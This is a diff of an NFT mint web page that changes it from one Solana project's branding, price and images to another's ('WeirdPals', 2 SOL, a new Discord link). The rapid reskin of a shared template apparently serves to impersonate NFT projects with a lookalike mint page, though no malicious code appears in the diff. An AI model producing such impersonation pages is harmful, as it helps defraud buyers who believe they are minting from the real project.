--- a/index.html
+++ b/index.html
@@ -4,17 +4,17 @@
     <meta charset="utf-8">
     <meta name="description" content="NTC" data-react-helmet="true" />
     <meta name="theme-color" content="#000000" />
-    <meta content="🌐 solport.io/mint" property="og:title">
+    <meta content="🌐 weirdpalsnft.com/mint" property="og:title">
     <meta content="
-    📣  Trippy Stoned Frogz Mint is now LIVE!
+    📣  WeirdPals Mint is now LIVE!
 
-    ◎   Mint Price: 1.5 SOL" property="og:description">
-    <meta content="https://pbs.twimg.com/profile_banners/1517533782148009984/1651582023/1500x500" property="og:image">
+    ◎   Mint Price: 2 SOL" property="og:description">
+    <meta content="https://pbs.twimg.com/profile_banners/1512859466886221836/1651943650/1500x500" property="og:image">
     <meta name="twitter:card" content="summary_large_image">
-    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/150" />
+    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/152" />
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-    <title>Trippy Stoned Frogz</title>
-    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1518169348594098176/V-0B2jzP_400x400.jpg" />
+    <title>WeirdPals</title>
+    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1523357065321791488/dPVKwouQ_400x400.jpg" />
     <link rel="stylesheet" type="text/css" href="css/all.min.css">
     <link rel="stylesheet" type="text/css" href="css/normalize.css">
     <link rel="stylesheet" type="text/css" href="css/style.css">
@@ -52,12 +52,12 @@
         <div class="main-area">
 
             <div class="main-area__right">
-                <h2 class="right-title">Trippy Stoned Frogz</h2>
+                <h2 class="right-title">WeirdPals</h2>
 
                 <div class="right-list">
                     <li>
                         <div class="text">
-                            2420 Addicted Frogz are coming to conquer the #Solana | $KIEF
+                            Join the underground revolution: http://discord.gg/weirdpalsnft 👁‍🗨
                     </li>
                     </div>
 
@@ -68,7 +68,7 @@
                             <a href="javascript:void(0)" class="plus-btn">+</a>
                         </div>
                         <div class="price-box">
-                            <div id="price-total"><span>1.5</span> SOL</div>
+                            <div id="price-total"><span>2</span> SOL</div>
                             <div>2 NFT max per transaction</div>
                         </div>
                     </div>
@@ -89,7 +89,7 @@
                 </style>
                 <div class="main-area__left">
                     <div class="slider-area">
-                        <img class="animation" src="https://pbs.twimg.com/media/FT8mQYNWIAQeCkk?format=jpg&name=large" alt="GiF">
+                        <img class="animation" src="https://pbs.twimg.com/media/FS5IDU0X0AA6grR?format=jpg&name=large" alt="GiF">
                     </div>
                 </div>
             </div>
@@ -105,7 +105,7 @@
         const $numberText = document.querySelector("#total");
         const $remaining = document.querySelector('#remaining');
         const $priceResultText = document.querySelector("#price-total span");
-        let itemPriceSelected = 1.5;
+        let itemPriceSelected = 2;
         let itemCount = 1;
 
         $plusButton.addEventListener("click", function(e) {
